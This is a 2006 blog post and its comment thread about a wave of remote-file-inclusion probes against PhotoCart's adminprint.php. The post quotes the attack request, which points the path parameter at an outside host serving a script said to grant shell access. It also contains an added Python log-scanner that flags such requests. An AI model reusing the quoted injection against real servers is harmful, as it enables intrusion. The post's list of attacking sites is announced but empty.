Wednesday, December 13, 2006

Escalating PhotoCart Vulnerability Attack

I thought this silly little phase had passed and these morons had given up, since there were only a few attempts after my last post. Sadly, that wasn't the case, and when I got up this morning and checked the site stats I found they had mounted an even bigger attack than before.

This is all good, just keep coming at my site and exposing the size of your network, because you're just proving Forrest Gump's mother correct: "Stupid is as stupid does."

Here's the path they desperately want, which doesn't exist on my server:

GET /PhotoCart/adminprint.php?path=http://panoplanet.com/c.in?

[UPDATE: It appears panoplanet.com has been taken down within the last couple of hours so you can't see the script anymore. Here are some links to show they were attacking others for a variety of things.]

Note that this is the script they are attempting to inject, which, from a casual glance at the code, appears to give them shell access.

Here are all the sites involved in today's attack:

Maybe it's time I send a few letters to the owners of these compromised servers and see what happens.
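As an added defender's example (not code from this post), here is a small Python log scan that picks out requests whose query parameter carries a remote URL, the shape of the adminprint.php?path=http://... request above, and tallies them per client IP and user agent the way the per-host list in the post does. The log lines are constructed samples, and example.invalid is a placeholder host.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" access-log format: client IP, timestamp, request line, status, bytes, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter whose value is itself a remote URL is the signature of a remote-file-inclusion probe.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample log lines (not from the post); example.invalid is a placeholder host.
SAMPLE_LOG = """\
10.0.0.1 - - [13/Dec/2006:06:12:01 -0800] "GET /PhotoCart/adminprint.php?path=http://example.invalid/c.in? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
10.0.0.1 - - [13/Dec/2006:06:12:02 -0800] "GET /photocart/adminprint.php?path=http://example.invalid/c.in? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
10.0.0.2 - - [13/Dec/2006:06:13:10 -0800] "GET /index.php?page=ftp://example.invalid/x.txt HTTP/1.0" 404 290 "-" "libwww-perl/5.65"
10.0.0.3 - - [13/Dec/2006:06:14:00 -0800] "GET /blog/2006/12/post.html HTTP/1.1" 200 8123 "-" "Mozilla/5.0 (X11; Linux)"
"""

def parse_line(line):
    """Split one combined-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def remote_url_params(target):
    """Return (name, value) pairs of query parameters whose value is a remote URL."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if v.lower().startswith(REMOTE_SCHEMES)]

def analyze(log_text):
    """Tally RFI-style requests per client IP, with the user agents and paths each one probed."""
    hits = defaultdict(lambda: {"count": 0, "agents": set(), "paths": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not remote_url_params(rec["target"]):
            continue
        h = hits[rec["ip"]]
        h["count"] += 1
        h["agents"].add(rec["ua"])
        h["paths"].add(urlsplit(rec["target"]).path.lower())  # case-folded: /PhotoCart vs /photocart
    return dict(hits)

def report(hits):
    """One line per offending IP, busiest first, in the same shape as the post's list."""
    return [f'{ip} requested {h["count"]} pages as {", ".join(sorted(h["agents"]))}'
            for ip, h in sorted(hits.items(), key=lambda kv: -kv[1]["count"])]
```

Running `report(analyze(SAMPLE_LOG))` over the sample yields two offending IPs and leaves the ordinary browser request out; in practice the same scan over a real access log is what turns a single suspicious request line into the per-host tally above.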

9 comments:

Anonymous said...

A 403 error page is a script capable of granting shell access? That's a new one on me...

IncrediBILL said...

Don't be a wise guy.

It looks like they took the entire domain offline so someone must've complained about being attacked.

Wish I'd kept a copy of the code, maybe I'll archive it next time if they launch another attack.

Anonymous said...

You appear to be mixing up 403 and Host Unknown errors here.

IncrediBILL said...

Sorry, but I'm not the one confused, you are. The status of the site has changed twice since I wrote the blog post.

You think the status quo would last on a domain involved in an attack?

Come on people, adapt to changing situations, sheesh.

Anonymous said...

I agree with anonymous, you're totally confused. That's a 403 error code and you're the one sending an attack to an innocent website.

IncrediBILL said...

OK, you're confused as well, the domain is OFFLINE....

curl panoplanet.com
curl: (7) socket error: 111

That's not a 403 or any other damn thing, it's toast and I just verified that from my computer, 2 anonymous proxies and from the command line on 2 servers.

Would you like fries with that?

IncrediBILL said...

Let's examine the infallible logic in your statement: I suck because I proved you wrong, fascinating.

If being correct means sucking, I'd prefer to suck than be you.

Anonymous said...

That's a different result than what I got. What I got was a 403 error from what was clearly a functioning HTTP server at the time.

IncrediBILL said...

Then you might want to upgrade to a better service with a fresh DNS cache as you should get a CONNECTION REFUSED, you can't even open a socket.

Besides, WHO CARES?

It's not even important, that site is down, the new site is here:

http://incredibill.blogspot.com/2006/12/next-wave-photocart-attack-with-new.html